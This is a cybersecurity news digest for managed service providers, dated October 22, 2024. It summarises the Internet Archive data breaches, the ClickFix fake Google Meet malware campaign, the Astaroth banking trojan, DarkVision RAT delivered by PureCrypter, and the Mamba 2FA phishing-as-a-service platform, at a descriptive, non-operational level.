MSP cybersecurity news digest, October 22, 2024

Internet Archive attacked, 31 million users’ data from its “Wayback Machine” exposed  

The Internet Archive faced its first major breach around September 28, 2024, when 31 million user records from its popular "Wayback Machine" were exposed. The breach was revealed through a JavaScript alert on the site, disclosing email addresses, bcrypt-hashed passwords and other internal data. Security expert Troy Hunt, creator of "Have I Been Pwned," confirmed the breach, and affected users will soon be able to check if their data was compromised. The Internet Archive immediately began efforts to secure its systems and strengthen security.

Shortly after the first breach, a second vulnerability was uncovered in the Internet Archive’s Zendesk email support platform. Unrotated GitLab authentication tokens enabled a threat actor to gain access to over 800,000 support tickets containing personal data dating back to 2018. This included requests for site removals and general support inquiries. Despite previous warnings about the exposed tokens, the Internet Archive had not rotated them, leading to another serious data breach.

As the story unfolded, it became clear that these breaches were not financially motivated. The threat actor behind the Zendesk breach had also accessed the Internet Archive's source code and other sensitive information.

ClickFix campaign lures users to fake Google Meet pages to deliver info-stealing malware

A new ClickFix campaign uses Google Meet phishing emails to lure users to fake Google Meet pages. Once on the Google Meet page, a message displaying false connectivity errors appears, along with a “Try Fix” CTA. If a user clicks the CTA, PowerShell delivers info-stealing malware on Windows and macOS, such as DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, a clipboard hijacker, and Lumma Stealer.

A social engineering tactic first reported in May 2024, ClickFix was used by threat actor TA571, who impersonated errors for Chrome, Microsoft Word and OneDrive. The campaign tricks users into copying PowerShell code to the clipboard, which they run in the Windows Command Prompt, infecting their system. Victims ultimately download malware like DarkGate, Lumma Stealer or AMOS Stealer for macOS.

Recent attacks target industries like transport and logistics, using phishing emails, fake Facebook pages and deceptive GitHub issues. These campaigns are linked to two threat groups: Slavic Nation Empire and Scamquerteo — subteams of cryptocurrency scam gangs. Researchers also identified a number of other platforms being impersonated to distribute malware, including Zoom, web3 browsers and video games being used in similar attacks.

Threat actor Water Makara deploys Astaroth banking trojan to target Latin American companies

Researchers have discovered that a threat actor group dubbed Water Makara deploys the Astaroth banking trojan in a new spear-phishing campaign targeting companies in Latin America, and especially in Brazil. The campaign primarily impacts manufacturing, retail, and government sectors by disguising malicious emails as urgent tax documents to deceive users into downloading the malware.

The malware-embedded emails prompt recipients to download a zip file that contains a malicious Windows shortcut exploiting mshta.exe. This method establishes a connection to a command-and-control server, enabling further malicious actions.

Astaroth, although an old trojan, remains a persistent threat with the potential to cause long-term damage to consumer trust and business operations. To reduce risk, companies should implement strong password policies, multifactor authentication (MFA) and regular software updates.

PureCrypter loader delivers DarkVision RAT in new malware campaign

Researchers have uncovered a new malware campaign using the PureCrypter loader to deliver the DarkVision RAT.

Researchers observed this activity since July 2024. DarkVision RAT uses custom network protocols for communication and supports commands like keylogging, remote access and password theft. PureCrypter, available since 2022, is sold on a subscription basis to distribute various malware. The malware process involves decrypting and launching PureCrypter, which eventually loads DarkVision and sets up persistence mechanisms.

DarkVision RAT, first seen in 2020, costs as little as $60 and offers many malicious features. It is favored by attackers due to its affordability and extensive capabilities.

Phishing-as-a-service platform Mamba 2FA targets Microsoft 365 accounts

Mamba 2FA is a phishing-as-a-service (PhaaS) platform targeting Microsoft 365 accounts through adversary-in-the-middle (AiTM) attacks. It captures authentication tokens and bypasses MFA protections using well-crafted login pages.

Sold for $250 per month, Mamba 2FA has been active since November 2023 and has evolved to include proxy servers and short-lived link domains to avoid detection. It targets corporate and consumer accounts with phishing templates for services like OneDrive and SharePoint, dynamically mimicking company login pages. Captured credentials and cookies are sent to attackers via a Telegram bot for immediate access.

Mamba 2FA also uses sandbox detection to evade analysis.